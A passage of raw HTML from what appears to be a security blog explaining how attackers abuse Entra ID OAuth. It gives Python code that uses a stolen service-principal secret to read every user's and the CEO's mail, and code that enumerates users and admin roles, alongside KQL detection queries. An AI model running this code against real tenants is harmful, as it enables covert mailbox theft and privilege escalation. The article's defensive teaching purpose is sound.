plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Get access token  NO MFA, NO user interaction, NO Conditional Access</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">token_response </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">post</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"https://login.microsoftonline.com/</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">tenant_id</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">/oauth2/v2.0/token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    data</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"client_id\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> client_id</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"client_secret\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> client_secret</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"grant_type\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"client_credentials\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"scope\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/.default\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">access_token </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> token_response</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"access_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># With application permissions, access ALL users' mail (not just one account)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">headers </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"Bearer </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">access_token</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># List all users in the tenant</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">all_users </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/users?$select=id,mail,displayName,jobTitle\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Read mail for any specific executive</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ceo_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"ceo-user-object-id\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ceo_mail </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"https://graph.microsoft.com/v1.0/users/</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">ceo_id</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">/messages?$top=50\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"path-3-workload-identity-federation-abuse\">Path 3: Workload Identity Federation Abuse<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#path-3-workload-identity-federation-abuse\" class=\"hash-link\" aria-label=\"Direct link to Path 3: Workload Identity Federation Abuse\" title=\"Direct link to Path 3: Workload Identity Federation Abuse\" translate=\"no\">​</a></h4>\n<p>Newer environments use Workload Identity Federation to allow applications in external systems (GitHub Actions, AWS, GCP) to authenticate to Entra ID without secrets. If an attacker compromises the external system (e.g., a GitHub repository), they inherit the Entra ID permissions.</p>\n<div class=\"language-yaml codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-yaml codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># GitHub Actions workflow  legitimate use case</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># If the repository is compromised, attacker gets Entra ID access</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">name</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> Login to Azure</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">uses</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> azure/login@v1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">client-id</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> $</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> secrets.AZURE_CLIENT_ID </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">tenant-id</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> $</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> secrets.AZURE_TENANT_ID </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">subscription-id</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> $</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> secrets.AZURE_SUBSCRIPTION_ID </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># If attacker can trigger this workflow (via PR to public repo,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># or compromise of a maintainer account), they get the token</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"detection-for-service-principal-abuse\">Detection for Service Principal Abuse<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#detection-for-service-principal-abuse\" class=\"hash-link\" aria-label=\"Direct link to Detection for Service Principal Abuse\" title=\"Direct link to Detection for Service Principal Abuse\" translate=\"no\">​</a></h3>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Detect new credentials added to service principals</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AuditLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where OperationName in (</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Add service principal credentials\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Update application – Certificates and secrets management\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ModifiedApp = tostring(TargetResources[0].displayName),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ModifiedBy = tostring(InitiatedBy.user.userPrincipalName),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ModifiedByApp = tostring(InitiatedBy.app.displayName)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, ModifiedApp, ModifiedBy, ModifiedByApp, Result</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where Result == \"success\"</span><br></span></code></pre></div></div>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Hunt for service principal sign-ins from unexpected IPs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AADServicePrincipalSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where ResultType == 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| summarize </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    IPList = make_set(IPAddress),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Countries = make_set(LocationDetails.countryOrRegion),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    SignInCount = count()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    by ServicePrincipalName, bin(TimeGenerated, 1d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where array_length(IPList) &gt; 3 or array_length(Countries) &gt; 1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated desc</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-5-lateral-movement-via-entra-id--from-one-account-to-the-whole-tenant\">Section 5: Lateral Movement via Entra ID  From One Account to the Whole Tenant<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#section-5-lateral-movement-via-entra-id--from-one-account-to-the-whole-tenant\" class=\"hash-link\" aria-label=\"Direct link to Section 5: Lateral Movement via Entra ID  From One Account to the Whole Tenant\" title=\"Direct link to Section 5: Lateral Movement via Entra ID  From One Account to the Whole Tenant\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-attackers-move-from-a-compromised-user-to-full-tenant-control\">How Attackers Move From a Compromised User to Full Tenant Control<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#how-attackers-move-from-a-compromised-user-to-full-tenant-control\" class=\"hash-link\" aria-label=\"Direct link to How Attackers Move From a Compromised User to Full Tenant Control\" title=\"Direct link to How Attackers Move From a Compromised User to Full Tenant Control\" translate=\"no\">​</a></h3>\n<p>Getting a single user's tokens is usually not the endgame. The objective is typically:</p>\n<ul>\n<li class=\"\">Escalating to a Global Administrator</li>\n<li class=\"\">Accessing high-value data across multiple users</li>\n<li class=\"\">Establishing persistent access that survives incident response</li>\n<li class=\"\">Pivoting to Azure resources or on-premises AD via hybrid join</li>\n</ul>\n<p>Here is the attack chain an advanced threat actor executes after initial compromise.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"step-1-enumerate-the-tenant-stay-quiet\">Step 1: Enumerate the Tenant (Stay Quiet)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#step-1-enumerate-the-tenant-stay-quiet\" class=\"hash-link\" aria-label=\"Direct link to Step 1: Enumerate the Tenant (Stay Quiet)\" title=\"Direct link to Step 1: Enumerate the Tenant (Stay Quiet)\" translate=\"no\">​</a></h3>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Graph API enumeration  all legitimate API calls, no scanning tools</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">headers </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"Bearer </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">access_token</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 1. Get full user directory  who's valuable?</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">users </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/users\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"?$select=id,displayName,mail,jobTitle,department,officeLocation\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"&amp;$top=999\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 2. Find all role assignments  who has admin?</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">roles </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"?$expand=principal\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Filter for Global Admins, privileged roles</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">privileged_roles </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Global Administrator\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Privileged Role Administrator\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Application Administrator\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Exchange Administrator\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Security Administrator\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" 